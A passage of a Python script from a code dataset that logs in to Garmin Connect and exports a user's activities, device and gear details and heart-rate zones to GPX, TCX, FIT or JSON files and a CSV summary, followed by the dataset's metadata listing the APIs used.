present('metadataDTO', details):\n logging.warning('No metadataDTO')\n return None\n\n metadata = details['metadataDTO']\n device_app_inst_id = metadata['deviceApplicationInstallationId'] if present('deviceApplicationInstallationId', metadata) else None\n if device_app_inst_id:\n if device_app_inst_id not in device_dict:\n # observations...\n # details['metadataDTO']['deviceMetaDataDTO']['deviceId'] == null -> device uknown\n # details['metadataDTO']['deviceMetaDataDTO']['deviceId'] == '0' -> device unknown\n # details['metadataDTO']['deviceMetaDataDTO']['deviceId'] == 'someid' -> device known\n device_dict[device_app_inst_id] = None\n device_meta = metadata['deviceMetaDataDTO'] if present('deviceMetaDataDTO', metadata) else None\n device_id = device_meta['deviceId'] if present('deviceId', device_meta) else None\n if 'deviceId' not in device_meta or device_id and device_id != '0':\n device_json = http_caller(URL_GC_DEVICE + str(device_app_inst_id))\n file_writer(os.path.join(args.directory, f'device_{device_app_inst_id}.json'), device_json, 'w', start_time_seconds)\n if not device_json:\n logging.warning('Device details %s are empty', device_app_inst_id)\n device_dict[device_app_inst_id] = 'device_id:' + str(device_app_inst_id)\n else:\n device_details = json.loads(device_json)\n if present('productDisplayName', device_details):\n device_dict[device_app_inst_id] = device_details['productDisplayName'] + ' ' + device_details['versionString']\n else:\n logging.warning('Device details %s incomplete', device_app_inst_id)\n return device_dict[device_app_inst_id]\n return None\n\n\ndef load_zones(activity_id, start_time_seconds, args, http_caller, file_writer):\n \"\"\"\n Get the heart rate zones.\n :param activity_id: ID of the activity (as a string)\n :param start_time_seconds: if given use as timestamp for the file written (in seconds since 1970-01-01)\n :param args: command-line arguments (for the file_writer callback)\n :param http_caller: callback to perform the HTTP call for downloading the device details\n :param file_writer: callback that saves the device details in a file\n :return: array with the heart rate zones\n \"\"\"\n zones = HR_ZONES_EMPTY\n zones_json = http_caller(f'{URL_GC_ACTIVITY}{activity_id}/hrTimeInZones')\n file_writer(os.path.join(args.directory, f'activity_{activity_id}_zones.json'), zones_json, 'w', start_time_seconds)\n zones_raw = json.loads(zones_json)\n if not zones_raw:\n logging.warning(('HR zones %s are empty', activity_id))\n else:\n for raw_zone in zones_raw:\n if present('zoneNumber', raw_zone):\n index = raw_zone['zoneNumber'] - 1\n zones[index] = {}\n zones[index]['secsInZone'] = raw_zone['secsInZone']\n zones[index]['zoneLowBoundary'] = raw_zone['zoneLowBoundary']\n return zones\n\n\ndef load_gear(activity_id, args):\n \"\"\"\n Retrieve the gear/equipment for an activity.\n \"\"\"\n try:\n gear_json = http_req_as_string(URL_GC_GEAR + activity_id)\n gear = json.loads(gear_json)\n if gear:\n if args.verbosity > 0:\n write_to_file(os.path.join(args.directory, f'activity_{activity_id}-gear.json'), gear_json, 'w')\n gear_display_name = gear[0]['displayName'] if present('displayName', gear[0]) else None\n gear_model = gear[0]['customMakeModel'] if present('customMakeModel', gear[0]) else None\n logging.debug('Gear for %s = %s/%s', activity_id, gear_display_name, gear_model)\n return gear_display_name if gear_display_name else gear_model\n return None\n except HTTPError as e:\n logging.info('Unable to get gear for %d, error: %s', activity_id, e)\n\n\ndef export_data_file(activity_id, activity_details, args, file_time, append_desc, date_time):\n \"\"\"\n Write the data of the activity to a file, depending on the chosen data format.\n The default filename is 'activity_' + activity_id, but this can be modified by the '--fileprefix' option\n and the 'appen_desc' parameter.\n The directory to write the file into can be modified by the '--subdir' option.\n :param activity_id: ID of the activity (as string)\n :param activity_details: details of the activity (for format 'json')\n :param args: command-line arguments\n :param file_time: if given the desired timestamp for the activity file (in seconds since 1970-01-01)\n :param append_desc: suffix to the default filename\n :para date_time: datetime in ISO format used for '--fileprefix' and '--subdir' options\n :return: True if the file was written, False if the file existed already\n \"\"\"\n\n # time dependent subdirectory for activity files, e.g. '{YYYY}'\n if not args.subdir is None:\n directory = resolve_path(args.directory, args.subdir, date_time)\n else:\n directory = args.directory\n\n if not os.path.isdir(directory):\n os.makedirs(directory)\n\n # timestamp as prefix for filename\n if args.fileprefix > 0:\n prefix = \"{}-\".format(date_time.replace(\"-\", \"\").replace(\":\", \"\").replace(\" \", \"-\"))\n else:\n prefix = \"\"\n\n original_basename = None\n if args.format == 'gpx':\n data_filename = os.path.join(directory, f'{prefix}activity_{activity_id}{append_desc}.gpx')\n download_url = f'{URL_GC_GPX_ACTIVITY}{activity_id}?full=true'\n file_mode = 'w'\n elif args.format == 'tcx':\n data_filename = os.path.join(directory, f'{prefix}activity_{activity_id}{append_desc}.tcx')\n download_url = f'{URL_GC_TCX_ACTIVITY}{activity_id}?full=true'\n file_mode = 'w'\n elif args.format == 'original':\n data_filename = os.path.join(directory, f'{prefix}activity_{activity_id}{append_desc}.zip')\n # but not all original files are in FIT format, some are gpx or TCX\n original_basename = os.path.join(directory, f'{prefix}activity_{activity_id}{append_desc}')\n download_url = URL_GC_ORIGINAL_ACTIVITY + activity_id\n file_mode = 'wb'\n elif args.format == 'json':\n data_filename = os.path.join(directory, f'{prefix}activity_{activity_id}{append_desc}.json')\n file_mode = 'w'\n else:\n raise Exception('Unrecognized format.')\n\n if os.path.isfile(data_filename):\n logging.debug('Data file for %s already exists', activity_id)\n print('\\tData file already exists. Skipping...')\n return False\n\n if args.format == 'original' and (os.path.isfile(original_basename + '.fit') or os.path.isfile(original_basename + '.gpx') or os.path.isfile(original_basename + '.tcx')):\n logging.debug('Original data file for %s already exists', activity_id)\n print('\\tOriginal data file already exists. Skipping...')\n return False\n\n if args.format != 'json':\n try:\n data = http_req(download_url)\n except HTTPError as e:\n if e.code == 500 and args.format == '.tcx':\n logging.info('Writing empty file since Garmin did not generate a TCX file for this activity...')\n data = ''\n else:\n logging.info('Got %s for %s', e.code, download_url)\n raise Exception(f'Failed. Got an HTTP error {e.code} for {download_url}')\n else:\n data = activity_details\n\n # persist file\n write_to_file(data_filename, data, file_mode, file_time)\n\n # Success: Add activity ID to downloaded_ids.json\n update_download_stats(activity_id, args.directory)\n\n if args.format == 'original':\n # even\n if args.unzip and data_filename[-3:].lower() == 'zip':\n logging.debug('Unzipping and removing original file, size is %s', os.stat(data_filename).st_size)\n if os.stat(data_filename).st_size > 0:\n zip_file = open(data_filename, 'rb')\n zip_obj = zipfile.ZipFile(zip_file)\n for name in zip_obj.namelist():\n unzipped_name = zip_obj.extract(name, directory)\n name_base, name_ext = os.path.splitext(name)\n # handle some cases from 2020 activities, where Garmin added '_ACTIVITY' to the name in the ZIP and remove it\n name_base = name_base.replace('_ACTIVITY', '')\n new_name = os.path.join(directory, f'{prefix}activity_{name_base}{append_desc}{name_ext}')\n logging.debug('renaming %s to %s', unzipped_name, new_name)\n os.rename(unzipped_name, new_name)\n if file_time:\n os.utime(new_name, (file_time, file_time))\n zip_file.close()\n else:\n print('\\tSkipping 0Kb zip file.')\n os.remove(data_filename)\n\n return True\n\n\ndef setup_logging(args):\n \"\"\"\n Setup logging.\n \"\"\"\n logpath = args.logpath if args.logpath else args.directory\n if not os.path.isdir(logpath):\n os.makedirs(logpath)\n\n logging.basicConfig(\n filename = os.path.join(logpath, 'gcexport.log'),\n level = logging.DEBUG,\n format = '%(asctime)s [%(levelname)-7.7s] %(message)s'\n )\n\n # set up logging to console\n console = logging.StreamHandler()\n console.setLevel(logging.WARN)\n formatter = logging.Formatter('[%(levelname)s] %(message)s')\n console.setFormatter(formatter)\n logging.getLogger('').addHandler(console)\n\n\ndef logging_verbosity(verbosity):\n \"\"\"\n Adapt logging verbosity, separately for loglife and console output.\n \"\"\"\n logger = logging.getLogger()\n for handler in logger.handlers:\n if isinstance(handler, logging.FileHandler):\n level = logging.DEBUG if verbosity > 0 else logging.INFO\n handler.setLevel(level)\n logging.info('New logfile level: %s', logging.getLevelName(level))\n elif isinstance(handler, logging.StreamHandler):\n level = logging.DEBUG if verbosity > 1 else (logging.INFO if verbosity > 0 else logging.WARN)\n handler.setLevel(level)\n logging.debug('New console log level: %s', logging.getLevelName(level))\n\n\ndef fetch_userstats(args):\n \"\"\"\n HTTP request for getting user statistic like total number of activities. The JSON will be saved as a file 'userstats.json'.\n :param args: command-line arguments (for args.directory, etc)\n :return: JSON with user statistics\n \"\"\"\n print('Getting display name...', end='')\n logging.info('Profile page %s', URL_GC_PROFILE)\n profile_page = http_req_as_string(URL_GC_PROFILE)\n if args.verbosity > 0:\n write_to_file(os.path.join(args.directory, 'profile.html'), profile_page, 'w')\n\n display_name = extract_display_name(profile_page)\n print('Done. displayName = ', display_name, sep='')\n\n print('Fetching user stats...', end='')\n logging.info('Userstats page %s', URL_GC_USERSTATS + display_name)\n result = http_req_as_string(URL_GC_USERSTATS + display_name)\n print('Done')\n\n write_to_file(os.path.join(args.directory, 'userstats.json'), result, 'w')\n\n return json.loads(result)\n\n\ndef extract_display_name(profile_page):\n \"\"\"\n Extract the display name from the profile page HTML document.\n\n :param profile_page: HTML document\n :return: the display name\n \"\"\"\n # display name should be in the HTML document as \"displayName\": \"John/Doe\"\n pattern = re.compile(r\".*\\\"displayName\\\":\\\"(.+?)\\\".*\", re.MULTILINE | re.DOTALL)\n match = pattern.match(profile_page)\n if not match:\n raise Exception('Did not find the display name in the profile page.')\n display_name = match.group(1)\n return display_name\n\n\ndef fetch_activity_list(args, total_to_download):\n \"\"\"\n Fetch the first 'total_to_download' activity summaries; as a side effect save them in .JSON format.\n :param args: command-line arguments (for args.directory, etc.)\n :param total_to_download: number of activities to download\n :return: list of activity summaries\n \"\"\"\n activities = []\n\n total_downloaded = 0\n while total_downloaded < total_to_download:\n if total_to_download - total_downloaded > LIMIT_MAXIMUM:\n num_to_download = LIMIT_MAXIMUM\n else:\n num_to_download = total_to_download - total_downloaded\n\n chunk = fetch_activity_chunk(args, num_to_download, total_downloaded)\n activities.extend(chunk)\n total_downloaded += num_to_download\n\n # it seems that parent multisport activities are not counted in userstats\n if len(activities) != total_to_download:\n logging.info('Expected %s activities, got %s', total_to_download, len(activities))\n return activities\n\n\ndef annotate_activity_list(activities, start, exclude_list):\n \"\"\"\n Annotate activity list.\n \"\"\"\n action_list = []\n for index, a in enumerate(activities):\n if index < (start - 1):\n action = 's'\n elif str(a['activityId']) in exclude_list:\n action = 'e'\n else:\n action = 'd'\n\n action_list.append(dict(index=index, action=action, activity=a))\n\n return action_list\n\n\ndef fetch_activity_chunk(args, num_to_download, total_downloaded):\n \"\"\"\n Fetch a chunk of activity summaries. As a side effect save them in the JSON format.\n :param args: command-line ar guments (for args.directory, etc.)\n :param num_to_download: number of summaries to wodnload in this chunk\n :param total_downloaded: number of already downloaded summaries in previous chunks\n :return: List of activity summaries\n \"\"\"\n\n search_parameters = {\n 'start': total_downloaded,\n 'limit': num_to_download\n }\n print('Querying list of activities ', total_downloaded+1, '..', total_downloaded+num_to_download, '...', sep='', end='')\n logging.info('Activity list URL %s', URL_GC_LIST + urlencode(search_parameters))\n result = http_req_as_string(URL_GC_LIST + urlencode(search_parameters))\n print('Done.')\n\n # persist JSON activities list\n current_index = total_downloaded + 1\n activities_list_filename = f'activities-{current_index}-{total_downloaded+num_to_download}.json'\n write_to_file(os.path.join(args.directory, activities_list_filename), result, 'w')\n activity_summaries = json.loads(result)\n fetch_multisports(activity_summaries, http_req_as_string, args)\n return activity_summaries\n\n\ndef fetch_multisports(activity_summaries, http_caller, args):\n \"\"\"\n Search 'activity_summaries' for multisport activities and then fetch the information for the activity parts\n and insert them into the 'activity_summaries' just after the multisport activity.\n :param activity_summaries: list of activity_summaries, will be modified in-place\n :param http_caller: callback to perform the HTTP call for downloading the activity details\n :param args: command-line arguments (for args.directory, etc.)\n \"\"\"\n for idx, child_summary in enumerate(activity_summaries):\n type_key = None if absent_or_null('activityType', child_summary) else child_summary['activityType']['typeKey']\n if type_key == 'multi_sport':\n details_string, details = fetch_details(child_summary['activityId'], http_caller)\n\n child_ids = details['metadataDTO']['childIds'] if 'metadataDTO' in details and 'childIds' in details['metadataDTO'] else None\n # inserting the childs in reversed order always at the same index to get\n for child_id in reversed(child_ids):\n child_string, child_details = fetch_details(child_id, http_caller)\n if args.verbosity > 0:\n write_to_file(os.path.join(args.directory, f'child_{child_id}.json'), child_string, 'w')\n child_summary = dict()\n copy_details_to_summary(child_summary, child_details)\n activity_summaries.insert(idx + 1, child_summary)\n\ndef fetch_details(activity_id, http_caller):\n \"\"\"\n Try to get the activity details for an activity.\n :param activity_id: id of the activity to fetch\n :param http_caller: callback to perform the HTTP call for downloading the activity details\n :return details_as_string, details_as_json_dict:\n \"\"\"\n activity_details = None\n details = None\n tries = MAX_TRIES\n while tries > 0:\n activity_details = http_caller(f'{URL_GC_ACTIVITY}{activity_id}')\n details = json.loads(activity_details)\n if details['summaryDTO']:\n tries = 0\n else:\n logging.info('Retrying activity details download %s', URL_GC_ACTIVITY + str(activity_id))\n tries -= 1\n if tries == 0:\n raise Exception(f\"Didn't get 'summaryDTO' after {MAX_TRIES} tries for {activity_id}.\")\n return activity_details, details\n\n\ndef copy_details_to_summary(summary, details):\n \"\"\"\n Add some activity properties from the 'details' dict to the 'summary' dict. The choice of which properties are copied is determined\n by the properties used by the 'csv_write_second' method.\n :param summary: summary dict, will be modified in-place\n :param details: details dict\n \"\"\"\n summary['activityId'] = details['activityId']\n summary['activityName'] = details['activityName']\n summary['description'] = details['description'] if present('description', details) else None\n summary['activityType'] = {}\n summary['activityType']['typeId'] = details['activityTypeDTO']['typeId'] if 'activityTypeDTO' in details and present('typeId', details['activityTypeDTO']) else None\n summary['activityType']['typeKey'] = details['activityTypeDTO']['typeKey'] if 'activityTypeDTO' in details and present('typeKey', details['activityTypeDTO']) else None\n summary['activityType']['parentTypeId'] = details['activityTypeDTO']['parentTypeId'] if 'activityTypeDTO' in details and present('parentTypeId', details['activityTypeDTO']) else None\n summary['eventType'] = {}\n summary['eventType']['typeKey'] = details['eventType']['typeKey'] if 'eventType' in details and present('typeKey', details['eventType']) else None\n summary['startTimeLocal'] = details['summaryDTO']['startTimeLocal'] if 'summaryDTO' in details and 'startTimeLocal' in details['summaryDTO'] else None\n summary['startTimeGMT'] = details['summaryDTO']['startTimeGMT'] if 'summaryDTO' in details and 'startTimeGMT' in details['summaryDTO'] else None\n summary['duration'] = details['summaryDTO']['duration'] if 'summaryDTO' in details and 'duration' in details['summaryDTO'] else None\n summary['distance'] = details['summaryDTO']['distance'] if 'summaryDTO' in details and 'distance' in details['summaryDTO'] else None\n summary['averageSpeed'] = details['summaryDTO']['averageSpeed'] if 'summaryDTO' in details and 'averageSpeed' in details['summaryDTO'] else None\n summary['maxHR'] = details['summaryDTO']['maxHR'] if 'summaryDTO' in details and 'maxHR' in details['summaryDTO'] else None\n summary['averageHR'] = details['summaryDTO']['averageHR'] if 'summaryDTO' in details and 'averageHR' in details['summaryDTO'] else None\n summary['elevationCorrected'] = details['metadataDTO']['elevationCorrected'] if 'metadataDTO' in details and 'elevationCorrected' in details['metadataDTO'] else None\n\ndef main(args):\n \"\"\"\n Main entrypoint for script.\n \"\"\"\n args = parse_arguments(args)\n setup_logging(args)\n logging.info(\"Starting %s version %s, usin Python version %s\", args[0], SCRIPT_VERSION, python_version())\n logging_verbosity(args.verbosity)\n\n print('Welcome to Garmin Connect Exporter')\n\n if sys.version_info.major < 3:\n print('Please upgrade to Python 3.x version', python_version(), \"isn't supported anymore.\")\n sys.exit(1)\n\n # Get filter list with IDs to exclude\n if args.exclude is not None:\n exclude_list = read_exclude(args.exclude)\n if exclude_list is None:\n sys.exit(1)\n else:\n exclude_list = []\n\n if os.path.isdir(args.directory):\n logging.warning('Output directory %s already exists. Skipping already-downloaded files and appending them to the CSV file.', args.directory)\n else:\n os.mkdir(args.directory)\n\n login_to_garmin_connect(args)\n\n csv_filename = args.directory + '/activities.csv'\n csv_existed = os.path.isfile(csv_filename)\n\n csv_file = open(csv_filename, mode='a', encoding='utf-8')\n csv_filter = CsvFilter(csv_file, args.template)\n\n # write header to CSV file\n if not csv_existed:\n csv_filter.write_header()\n\n # Query the userstats (activities totals on the profile page) that are needed for filtering and for downloading 'all'\n userstats_json = fetch_userstats(args)\n\n if args.count == 'all':\n total_to_download = int(userstats_json['userMetrics'][0]['totalActivities'])\n else:\n total_to_download = int(args.count)\n\n device_dict = dict()\n\n activity_type_properties = http_req_as_string(URL_GC_ACT_PROPS)\n if args.verbosity > 0:\n write_to_file(os.path.join(args.directory, 'activity_types.properties'), activity_type_properties, 'w')\n activity_type_name = load_properties(activity_type_properties)\n event_type_properties = http_req_as_string(URL_GC_EVT_PROPS)\n if args.verbosity > 0:\n write_to_file(os.path.join(args.directory, 'event_types.properties'), activity_type_properties, 'w')\n event_type_name = load_properties(event_type_properties)\n\n activities = fetch_activity_list(args, total_to_download)\n action_list = annotate_activity_list(activities, args.start_activity_no, exclude_list)\n\n for item in action_list:\n current_index = item['index'] + 1\n activity = item['activity']\n action = item['action']\n\n # Action: skipping\n if action == 's':\n print('Skipping : Garmin Connect activity ', end='')\n print(f\"({current_index}/{len(action_list)}) [{activity['activityId']}]\")\n continue\n\n # Action: excluding\n if action == 'e':\n print('Excluding : Garmin Connect activity ', end='')\n print(f\"({current_index}/{len(action_list)}) [{activity['activityId']}]\")\n continue\n\n # Action: download\n print('Downloading: Garmin Connect activity ', end='')\n print(f\"({current_index}/{len(action_list)}) [{activity['activityId']}] {activity['activityName']}\")\n\n # Retrieve also the detail data from the activity\n activity_details, details = fetch_details(activity['activityId'], http_req_as_string)\n\n extract = {}\n extract['start_time_with_offset'] = offset_date_time(activity['startTimeLocal'], activity['startTimeGMT'])\n elapsed_duration = details['summaryDTO']['elapsedDuration'] if 'summaryDTO' in details and 'elapsedDuration' in details ['summaryDTO'] else None\n extract['elapsed_duration'] = elapsed_duration if elapsed_duration else activity['duration']\n extract['elapsed_seconds'] = int(round(extract['elapsed_duration']))\n extract['end_time_with_offset'] = extract['start_time_with_offset'] + timedelta(seconds=extract['elapsed_seconds'])\n\n print('\\t', extract['start_time_with_offset'].isoformat(), ', ', sep='', end='')\n print(hhmmss_from_seconds(extract['elapsed_seconds']), ', ', sep='', end='')\n if 'distance' in activity and isinstance(activity['distance'], (float)):\n print(\"{0:.3f}\".format(activity['distance']/1000), 'km', sep='')\n else:\n print('0.000 km')\n\n if args.desc is not None:\n append_desc = '_' + sanitize_filename(activity['activityName'], args.desc)\n else:\n append_desc = ''\n\n if args.originaltime:\n start_time_seconds = epoch_seconds_from_summary(activity)\n else:\n start_time_seconds = None\n\n extract['device'] = extract_device(device_dict, details, start_time_seconds, args, http_req_as_string, write_to_file)\n\n # try to get the JSON with all the samples\n extract['samples'] = None\n if csv_filter.is_column_active('sampleCount'):\n try:\n activity_measurements = http_req_as_string(f\"{URL_GC_ACTIVITY}{activity['activityId']}/details\")\n write_to_file(os.path.join(args.directory, f\"activity {activity['activityId']}_samples.json\"), activity_measurements, 'w', start_time_seconds)\n samples = json.loads(activity_measurements)\n extract['samples'] = samples\n except HTTPError:\n pass\n\n extract['gear'] = None\n if csv_filter.is_column_active('gear'):\n extract['gear'] = load_gear(str(activity['activityId']), args)\n\n extract['hrZones'] = HR_ZONES_EMPTY\n if csv_filter.is_column_active('hrZone1Low') or csv_filter.is_column_active('hrZone1Seconds'):\n extract['hrZones'] = load_zones(str(activity['activityId']), start_time_seconds, args, http_req_as_string, write_to_file)\n\n # Save the file and log if it already existed. If yes, do not append the record to the CSV\n if export_data_file(str(activity['activityId']), activity_details, args, start_time_seconds, append_desc, activity['startTimeLocal']):\n csv_write_record(csv_filter, extract, activity, details, activity_type_name, event_type_name)\n\n csv_file.close()\n\n if args.external:\n print('Open CSV output')\n print(csv_filename)\n call([args.external, \"--\" + args.args, csv_filename])\n\n print('Done!')\n\nif __name__ == \"__main__\":\n try:\n main(sys.argv)\n except KeyboardInterrupt:\n print('Interrupted')\n sys.exit(0)\n", "repo_name": "krzliszka/garmin-export", "sub_path": "export.py", "file_name": "export.py", "file_ext": "py", "file_size_in_byte": 61539, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "http.cookiejar.cookiejar.CookieJar", "line_number": 41, "usage_type": "call"}, {"api_name": "http.cookiejar.cookiejar", "line_number": 41, "usage_type": "attribute"}, {"api_name": "http.cookiejar", "line_number": 41, "usage_type": "name"}, {"api_name": "urllib.request.build_opener", "line_number": 42, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 42, "usage_type": "attribute"}, {"api_name": "urllib.request.HTTPCookieProcessor", "line_number": 42, "usage_type": "call"}, {"api_name": "urllib.request.HTTPSHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 49, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 78, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 142, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 144, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 155, "usage_type": "call"}, {"api_name": "unicodedata.normalize", "line_number": 172, "usage_type": "call"}, {"api_name": "io.open", "line_number": 187, "usage_type": "call"}, {"api_name": "io.open", "line_number": 191, "usage_type": "call"}, {"api_name": "os.utime", "line_number": 197, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 208, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 217, "usage_type": "call"}, {"api_name": "timeit.default_timer", "line_number": 219, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 223, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 225, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 226, "usage_type": "call"}, {"api_name": "urllib.error.URLError", "line_number": 228, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 230, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 232, "usage_type": "call"}, {"api_name": "timeit.default_timer", "line_number": 232, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 233, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 238, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 316, "usage_type": "call"}, {"api_name": "datetime.tzinfo", "line_number": 319, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 326, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 337, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 357, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 363, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 363, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 377, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 416, "usage_type": "call"}, {"api_name": "csv.QUOTE_ALL", "line_number": 416, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 449, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 449, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 452, "usage_type": "call"}, {"api_name": "getpass.getpass", "line_number": 498, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 500, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 500, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 507, "usage_type": "call"}, {"api_name": "os.path", "line_number": 507, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 509, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 525, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 529, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 531, "usage_type": "call"}, {"api_name": "os.path", "line_number": 531, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 534, "usage_type": "call"}, {"api_name": "re.MULTILINE", "line_number": 534, "usage_type": "attribute"}, {"api_name": "re.DOTALL", "line_number": 534, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 542, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 556, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 672, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 688, "usage_type": "call"}, {"api_name": "os.path", "line_number": 688, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 690, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 693, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 697, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 714, "usage_type": "call"}, {"api_name": "os.path", "line_number": 714, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 715, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 717, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 734, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 737, "usage_type": "call"}, {"api_name": "os.path", "line_number": 737, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 740, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 743, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 744, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 768, "usage_type": "call"}, {"api_name": "os.path", "line_number": 768, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 769, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 779, "usage_type": "call"}, {"api_name": "os.path", "line_number": 779, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 783, "usage_type": "call"}, {"api_name": "os.path", "line_number": 783, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 787, "usage_type": "call"}, {"api_name": "os.path", "line_number": 787, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 789, "usage_type": "call"}, {"api_name": "os.path", "line_number": 789, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 793, "usage_type": "call"}, {"api_name": "os.path", "line_number": 793, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 798, "usage_type": "call"}, {"api_name": "os.path", "line_number": 798, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 799, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 803, "usage_type": "call"}, {"api_name": "os.path", "line_number": 803, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 804, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 811, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 813, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 816, "usage_type": "call"}, {"api_name": "filtering.update_download_stats", "line_number": 825, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 830, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 830, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 831, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 833, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 836, "usage_type": "call"}, {"api_name": "os.path", "line_number": 836, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 839, "usage_type": "call"}, {"api_name": "os.path", "line_number": 839, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 840, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 841, "usage_type": "call"}, {"api_name": "os.utime", "line_number": 843, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 847, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 857, "usage_type": "call"}, {"api_name": "os.path", "line_number": 857, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 858, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 860, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 861, "usage_type": "call"}, {"api_name": "os.path", "line_number": 861, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 862, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 867, "usage_type": "call"}, {"api_name": "logging.WARN", "line_number": 868, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 869, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 871, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 878, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 880, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 881, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 881, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 883, "usage_type": "call"}, {"api_name": "logging.getLevelName", "line_number": 883, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 884, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 885, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 885, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 885, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 887, "usage_type": "call"}, {"api_name": "logging.getLevelName", "line_number": 887, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 897, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 900, "usage_type": "call"}, {"api_name": "os.path", "line_number": 900, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 906, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 910, "usage_type": "call"}, {"api_name": "os.path", "line_number": 910, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 912, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 923, "usage_type": "call"}, {"api_name": "re.MULTILINE", "line_number": 923, "usage_type": "attribute"}, {"api_name": "re.DOTALL", "line_number": 923, 